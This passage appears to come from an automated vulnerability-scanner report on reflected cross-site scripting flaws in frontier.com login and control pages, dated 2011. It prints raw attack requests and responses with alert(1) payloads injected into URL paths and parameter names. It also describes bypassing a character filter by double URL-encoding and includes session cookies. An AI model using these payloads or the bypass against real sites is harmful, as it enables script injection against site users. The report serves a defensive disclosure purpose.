xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAxIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUJmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUIiIG5hbWU9InBob25lTnVtQiIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQycpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAyIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUNmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjQiIGlkPSJwaG9uZU51bUMiIG5hbWU9InBob25lTnVtQyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgZm91ci1kaWcgcDMiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBMaW5lIj4KICAgICAgICAgICAgICAgICAgICA8bGFiZWw%2Bb3IgWmlwIENvZGU8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQxIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJzdWJtaXRMaW5lIj48aW5wdXQgaWQ9Im92ZXJsYXlTdWJtaXQiIHZhbHVlPSIiIHR5cGU9InN1Ym1pdCI%2BPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJuZXdiaWUiIHR5cGU9ImNoZWNrYm94Ij4KICAgICAgICAgICAgICAgICAgICA8bGFiZWwgaWQ9Im5ld2JUZXh0IiBmb3I9Im5ld2JpZSI%2BQ2hlY2sgaGVyZSBpZiB5b3UgYXJlIGEgbmV3IGN1c3RvbWVyLjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgPC9mb3JtPgogICAgPC9kaXY%2BCjwvZGl2Pgo8IS0tTWFya3VwIGZvciAgT3ZlcmxheSB0aGF0IGNhbiBiZSBjbG9zZWQgd2l0aG91dCBzdWJtaXR0aW5nIHBob25lL3ppcC0tPgo8ZGl2IGlkPSJvdmVybGF5Rm9ybSIgY2xhc3M9Im92ZXJsYXkiPgogICAgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZ3JhZGllbnRCb3gucG5nIiBoZWlnaHQ9IjI2MyIgd2lkdGg9IjY0MCI%2BCiAgICA8ZGl2IGNsYXNzPSJvdmVybGF5SW5uZXIiPgogICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJjbG9zZU92ZXJsYXkiPkNMT1NFPC9hPgogICAgICAgIDxoMT5IZWxsbyE8L2gxPgogICAgICAgIDxwPlRvIHByb3ZpZGUgeW91IHdpdGggcHJvZHVjdHMgYW5kIHNlcnZpY2VzIHRoYXQgYmVzdCBtZWV0IHlvdXIgbmVlZHMsIHdlIG5lZWQgdG8ga25vdyB5b3VyIGxvY2F0aW9uLiBUaGlzIGluZm9ybWF0aW9uIGlzIGtlcHQgcHJpdmF0ZSE8L3A%2BCiAgICAgICAgPGZvcm0gbmFtZT0iZkZvcm0yIiBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI%2BCiAgICAgICAgICAgIDxkaXYgaWQ9ImVycm9yRmllbGQyIiBjbGFzcz0ib3ZlcmxheUVycm9yIj5QbGVhc2UgZW50ZXIgYSB2YWxpZCBwaG9uZSBudW1iZXIgb3IgemlwIGNvZGUuPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lTGluZSI%2BCiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJwaG9uZSI%2BUGhvbmUgTnVtYmVyPC9sYWJlbD4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lRmllbGQiPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lQWZpZWxkIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG1heGxlbmd0aD0iMyIgaWQ9InBob25lTnVtQ2hhbmdlQSIgbmFtZT0icGhvbmVOdW1DaGFuZ2VBIiBvbmtleXVwPSJyZXR1cm4gdHJhcEtleXMoZXZlbnQsdGhpcywncGhvbmVOdW1DaGFuZ2VCJyk7IiB2YWx1ZT0iIiBjbGFzcz0iZGVwdGhJbnB1dCB0aHJlZS1kaWcgcDEiIHR5cGU9InRleHQiPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lQmZpZWxkIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG1heGxlbmd0aD0iMyIgaWQ9InBob25lTnVtQ2hhbmdlQiIgbmFtZT0icGhvbmVOdW1DaGFuZ2VCIiBvbmtleXVwPSJyZXR1cm4gdHJhcEtleXMoZXZlbnQsdGhpcywncGhvbmVOdW1DaGFuZ2VDJyk7IiB2YWx1ZT0iIiBjbGFzcz0iZGVwdGhJbnB1dCB0aHJlZS1kaWcgcDIiIHR5cGU9InRleHQiPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lQ2ZpZWxkIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG1heGxlbmd0aD0iNCIgaWQ9InBob25lTnVtQ2hhbmdlQyIgbmFtZT0icGhvbmVOdW1DaGFuZ2VDIiB2YWx1ZT0iIiBjbGFzcz0iZGVwdGhJbnB1dCBmb3VyLWRpZyBwMyIgdHlwZT0idGV4dCI%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcExpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsPm9yIFppcCBDb2RlPC9sYWJlbD4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQyIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ic3VibWl0TGluZSI%2BPGlucHV0IGlkPSJvdmVybGF5U3VibWl0Q2hhbmdlIiB2YWx1ZT0iIiB0eXBlPSJzdWJtaXQiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9Im5ld2JpZSIgdHlwZT0iY2hlY2tib3giPgogICAgICAgICAgICAgICAgPGxhYmVsIGlkPSJuZXdiVGV4dCIgZm9yPSJuZXdiaWUiPkNoZWNrIGhlcmUgaWYgeW91IGFyZSBhIG5ldyBjdXN0b21lci48L2xhYmVsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0%2BCiAgICA8L2Rpdj4KPC9kaXY%2BCmRkCei%2FS%2FmrhIn%2FFNx89jqMRuohsfs%3D&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtUsername=&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtPassword=&ctl00%24ctl00%24FOBasePH%24ContentPH%24btnLogin=%C2%BB+Log+In+&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/AgentOrdering/Logind2920'-alert(1)-'00fe8bd6112a72257/Default.aspx');//]]>
...[SNIP]...

2.95. https://www.frontier.com/BillPay/Login.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd8c'-alert(1)-'1c3c38ca197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPay2cd8c'-alert(1)-'1c3c38ca197/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPay2cd8c'-alert(1)-'1c3c38ca197/Login.aspx');//]]>
...[SNIP]...

2.96. https://www.frontier.com/BillPay/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a67f'%3balert(1)//b430a9201a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a67f';alert(1)//b430a9201a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPay/Login.aspx?3a67f'%3balert(1)//b430a9201a2=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/BillPay/Login.aspx?3a67f';alert(1)//b430a9201a2=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.97. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc153'-alert(1)-'4c0b46131a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controlsbc153'-alert(1)-'4c0b46131a0/VirtualCode.ashx?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43410


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsbc153'-alert(1)-'4c0b46131a0/VirtualCode.ashx');//]]>
...[SNIP]...

2.98. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f651%2527%253balert%25281%2529%252f%252f40ebae18800 was submitted in the REST URL parameter 2. This input was echoed as 7f651';alert(1)//40ebae18800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashx7f651%2527%253balert%25281%2529%252f%252f40ebae18800?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?404;https://www.frontier.com:443/Controls/VirtualCode.ashx7f651';alert(1)//40ebae18800?pageid=97&origPath=/NewStyleSheet.css/');//]]>
...[SNIP]...

2.99. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 293ac'-alert(1)-'b884da74b02dcdeaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop293ac'-alert(1)-'b884da74b02dcdeaf/Login.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwNjUxNjQ4MzgPZBYCZg9kFgJmD2QWBAIJDxYCHgRUZXh0BaMOPGRpdiBpZD0iaGVhZGVyIj4KICA8ZGl2IGNsYXNzPSJoZWFkZXJOYXYiPgogICAgPGRpdiBpZD0ibGVmdEhlYWRlciI%2BCiAgICAgIDxkaXYgY2xhc3M9ImxvZ28iPgogICAgICAgIDxhIGlkPSJob21lTGluayIgdGl0bGU9IkZyb250aWVyIENvbW11bmljYXRpb25zIiBocmVmPSIvIj4KICAgICAgICAgIDxpbWcgYWx0PSJGcm9udGllckxvZ28iIHNyYz0iL2ltYWdlcy9GVFJNYWluL2Zyb250aWVyX0xvZ28uanBnIiBib3JkZXI9IjAiIGhlaWdodD0iNTEiIHdpZHRoPSIxNTYiPgogICAgICAgIDwvYT4KICAgICAgPC9kaXY%2BCiAgICAgIDx1bCBpZD0iZHJvcGRvd25fbmF2Ij4KICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uT05MWUxFR0FDWSIgaHJlZj0iL0JpbGxQYXkvTG9naW4uYXNweCI%2BT25saW5lIEJpbGwgUGF5PC9hPjwvbGk%2BCiAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9mcm9udGllci5teS55YWhvby5jb20vIj5Gcm9udGllciBNeSBZYWhvbyE8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cHM6Ly9sb2dpbi5mcm9udGllci5jb20vd2VibWFpbC8iPkZyb250aWVyIE1haWw8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uT05MWUxFR0FDWSIgaHJlZj0iL1Nob3AvTG9naW4uYXNweCI%2BTXkgQWNjb3VudDwvYT48L2xpPgogICAgICAgIDxsaSBpZD0ic2VsZWN0ZWQiIGNsYXNzPSJhZ2VudGxvZ2luIj5BZ2VudCBMb2dpbiAKICAgICAgICAgIDxkaXYgY2xhc3M9ImFycm93Ij48aW1nIHNyYz0iL2ltYWdlcy9GVFJNYWluL3NtYWxsX2Fycm93LnBuZyIgYm9yZGVyPSIwIiBoZWlnaHQ9IjQiIHdpZHRoPSI3Ij48L2Rpdj4KICAgICAgICAgIDx1bD4KICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9BZ2VudE9yZGVyaW5nL0xvZ2luLyI%2BUmVzaWRlbnRpYWwgQWdlbnQ8L2E%2BPC9saT4KICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9CdXNpbmVzc0FnZW50T3JkZXIvTG9naW4vIj5CdXNpbmVzcyBBZ2VudDwvYT48L2xpPgogICAgICAgICAgPC91bD4KICAgICAgICA8L2xpPgogICAgICA8L3VsPgogICAgICA8ZGl2IGNsYXNzPSJsb2NhdGlvbiI%2BQ3VycmVudCBMb2NhdGlvbjoKICAgICAgICA8YSBpZD0iTG9jYWxlIiBjbGFzcz0iY2hhbmdlTG9jYWxlIiBocmVmPSIjIj5TZWxlY3QgTG9jYXRpb248L2E%2BCiAgICAgIDwvZGl2PgogICAgPC9kaXY%2BCiAgICA8ZGl2IGlkPSJyaWdodEhlYWRlciI%2BCiAgICAgIDxmb3JtIGFjdGlvbj0iIyI%2BCiAgICAgICAgPGRpdiBjbGFzcz0ic2VhcmNoQm94Ij4KICAgICAgICAgIDxpbnB1dCBpZD0idHh0U2VhcmNoIiBjbGFzcz0ic2VhcmNoVGV4dCIgbmFtZT0idHh0U2VhcmNoIj4KICAgICAgICAgIDxpbnB1dCBpZD0iYnRuU2VhcmNoIiBjbGFzcz0iU2VhcmNoQnV0dG9uIiB2YWx1ZT0iIiBzcmM9Ii9JbWFnZXMvRlRSTWFpbi9zZWFjaF9idG4uZ2lmIiBuYW1lPSJidG5TZWFyY2giIHR5cGU9ImltYWdlIj4gPC9kaXY%2BCiAgICAgICAgPGRpdiBjbGFzcz0ic2VhcmNoQnV0dG9ucyI%2BCiAgICAgICAgICA8aW5wdXQgdmFsdWU9IkZyb250aWVyIiBjaGVja2VkPSJjaGVja2VkIiBuYW1lPSJyZG9TZWFyY2giIHR5cGU9InJhZGlvIj4KICAgICAgICAgIDxzcGFuIGlkPSJTRkxpbmsiPlNlYXJjaCBGcm9udGllcjwvc3Bhbj4KICAgICAgICAgIDxpbnB1dCB2YWx1ZT0iUG9ydGFsIiBuYW1lPSJyZG9TZWFyY2giIHR5cGU9InJhZGlvIj4KICAgICAgICAgIDxzcGFuIGlkPSJTV0xpbmsiPlNlYXJjaCB0aGUgV2ViPC9zcGFuPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvcm0%2BCiAgICA8L2Rpdj4KICA8L2Rpdj4KPC9kaXY%2BZAILD2QWDAIBD2QWAgIBD2QWAmYPZBYCZg9kFgICAQ9kFgYCBw8PFgQfAAUNRW50ZXIgUGhvbmUgIx4LTmF2aWdhdGVVcmwFNy9SZWdpb24vRGVmYXVsdC5hc3B4P3R5cGU9MSZ1cmw9JTJmU2hvcCUyZkxvZ2luLmFzcHglM2ZkZAIJDw8WAh8BBTcvUmVnaW9uL0RlZmF1bHQuYXNweD90eXBlPTEmdXJsPSUyZlNob3AlMmZMb2dpbi5hc3B4JTNmZGQCCw8PFgIeB1Zpc2libGVoZGQCAw9kFgICAQ9kFgJmDxYCHwAFvAE8ZGl2IGlkPSJUb3BOYXZfQ29udGFpbmVyIj4NCgkJPC9kaXY%2BDQo8aW5wdXQgbmFtZT0iaGZQYWdlVHlwZSIgdHlwZT0iaGlkZGVuIiBpZD0iaGZQYWdlVHlwZSIgdmFsdWU9IjEiLz4NCjxpbnB1dCBuYW1lPSJoZlJlY29yZF9UeXBlIiB0eXBlPSJoaWRkZW4iIGlkPSJoZlJlY29yZF9UeXBlIiB2YWx1ZT0iQ2F0ZWdvcnkiLz4NCmQCCQ9kFgYCAQ9kFgICAQ8WAh8ABWA8YSBocmVmPSIvRGVmYXVsdC5hc3B4Ij5Ib21lPC9hPiAmcmFxdW87IDxhIGhyZWY9Ii9TaG9wUmVzLmFzcHgiPlNob3AgRnJvbnRpZXI8L2E%2BICZyYXF1bzsgTG9naW5kAgMPFgIfAmhkAgUPZBYQAgEPFgIfAAUQR3Vlc3QgVXNlciBMb2dpbmQCAw8WAh8ABVRNeUFjY291bnQgd2lsbCBzaG93IHlvdXIgY3VycmVudCBzZXJ2aWNlcyBhbmQgU2hvcEZyb250aWVyIG9yZGVyIHN0YXR1cy48YnIgLz48YnIgLz5kAgUPFgIfAAWOAUlmIHlvdSBhcmUgYW4gZXhpc3RpbmcgRnJvbnRpZXIgY3VzdG9tZXIgYW5kIHdpc2ggdG8gbG9nIGludG8gb3Igc2lnbiB1cCBmb3IgT25saW5lIEJpbGwgUGF5LCA8bm9icj48YSBocmVmPSIvQmlsbFBheS8iPmNsaWNrIGhlcmU8L2E%2BLjwvbm9icj5kAgcPFgIfAAU8RXhpc3RpbmcgRnJvbnRpZXIgY3VzdG9tZXJzLCBlbnRlciB5b3VyIGFjY291bnQgaW5mb3JtYXRpb24uZAILDxYCHwAFeDEuIEVudGVyIHlvdXIgYWNjb3VudCBudW1iZXIgYmVsb3cgd2l0aG91dCBzcGFjZXMgb3IgZGFzaGVzLiBBY2NvdW50IGluZm9ybWF0aW9uIGNhbiBiZSBmb3VuZCBvbiB5b3VyIHByaW50ZWQgc3RhdGVtZW50LmQCEw8WAh8ABWoyLiBFbnRlciB5b3VyIFBJTiAoUGVyc29uYWwgSWRlbnRpZmljYXRpb24gTnVtYmVyKSBiZWxvdy4gWW91ciBQSU4gY2FuIGJlIGZvdW5kIG9uIHlvdXIgcHJpbnRlZCBzdGF0ZW1lbnQuZAIdDxYCHwAFXjxibG9ja3F1b3RlPk5vdGU6IEZvciB5b3VyIHNlY3VyaXR5LCBwbGVhc2UgYmUgc3VyZSB0byBsb2cgb3V0IHdoZW4geW91IGFyZSBkb25lLjwvYmxvY2txdW90ZT5kAh8PFgIfAAXdAklmIHlvdSBkbyBub3TCoGtub3cgeW91ciBhY2NvdW50IG51bWJlciBhbmQgcGluLCA8YSBocmVmPSIvc2hvcC9lbWFpbC9kZWZhdWx0LmFzcHgiPmNsaWNrIGhlcmU8L2E%2BIHRvIGhhdmUgeW91ciBhY2NvdW50IG51bWJlciBhbmQgcGluIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzIG9uIGZpbGUuPGJyIC8%2BPGJyIC8%2BPG5vYnI%2BPGEgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iPkN1c3RvbWVyIFNlcnZpY2U8L2E%2BPC9ub2J